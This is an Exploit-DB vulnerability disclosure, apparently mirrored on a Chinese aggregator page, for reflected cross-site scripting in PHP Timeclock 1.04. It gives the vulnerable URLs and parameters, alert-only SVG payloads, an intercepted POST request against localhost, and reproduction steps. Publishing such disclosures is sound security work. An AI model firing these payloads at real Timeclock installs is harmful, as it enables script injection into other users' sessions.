PHP Timeclock 1.04 – ‘Multiple’ Cross Site Scripting (XSS)

• Exploit Database
• 38 阅读

• 作者： Tyler Butler
  日期： 2021-05-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49853/

• # Exploit Title: PHP Timeclock 1.04 - 'Multiple' Cross Site Scripting (XSS)
  # Date: May 3rd 2021
  # Exploit Author: Tyler Butler
  # Vendor Homepage: http://timeclock.sourceforge.net
  # Software Link: https://sourceforge.net/projects/timeclock/files/PHP%20Timeclock/PHP%20Timeclock%201.04/
  # Version: 1.04
  # Tested on: PHP 4.4.9/5.3.3 Apache 2.2 MySql 4.1.22/5
  
  Description: PHP Timeclock version 1.04 (and prior) suffers from multiple Cross-Site Scripting vulnerabilities
  
  #1: Unauthenticated Reflected XSS: Arbitrary javascript can be injected into the application by appending a termination /'> and payload directly to the end of the GET request URL. The vulnerable paths include (1) /login.php(2) /timeclock.php (3) /reports/audit.php and (4) /reports/timerpt.php. 
  
  
  Payload: /'><svg/onload=alert`xss`>
  
  Example: http://target/login.php/'%3E%3Csvg/onload=alert%60xss%60%3E
  ß
  
  Steps to reproduce:
  1. Navigate to a site that uses PHP Timeclock 1.04 or earlier
  2. Make a GET request to one of the four resources mentioned above
  3. Append /'> and the payload to the end of the request
  4. Submit the request and observe payload execution
  
  
  #2: Unauthenticated Reflected XSS: Arbitrary javascript can be injected into the application in POST requests to (1) /reports/audit.php (2) /reports/total_hours.php (3) /reports/timerpt.php via the from_date and to_date parameters.
  
  # Example: 
  
  POST /reports/audit.php HTTP/1.1
  Host: localhost
  Content-Length: 98
  Cache-Control: max-age=0
  sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90"
  sec-ch-ua-mobile: ?0
  Upgrade-Insecure-Requests: 1
  Origin: http://localhost
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  Sec-Fetch-Site: same-origin
  Sec-Fetch-Mode: navigate
  Sec-Fetch-User: ?1
  Sec-Fetch-Dest: document
  Referer: http://localhost/reports/audit.php
  Accept-Encoding: gzip, deflate
  Accept-Language: en-US,en;q=0.9
  Cookie: PHPSESSID=62cfcffbd929595ba31915b4d8f01d7d; remember_me=foo
  Connection: close
  
  date_format=M%2Fd%2Fyyyy&from_date=5%2F2%2F2021'><svg/onload=alert`xss`>&to_date=5%2F18%2F2021&csv=0&submit.x=40&submit.y=5
  
  
  Payload: '><svg/onload=alert`xss`>
  
  
  Steps to reproduce:
  1. Navigate to a site that uses PHP Timeclock 1.04 or earlier
  2. Create a report at one of the vulnerable directories noted above
  3. Intercept the request with a proxy tool like BurpSuite
  4. Inject payload into the from_date or to_date fields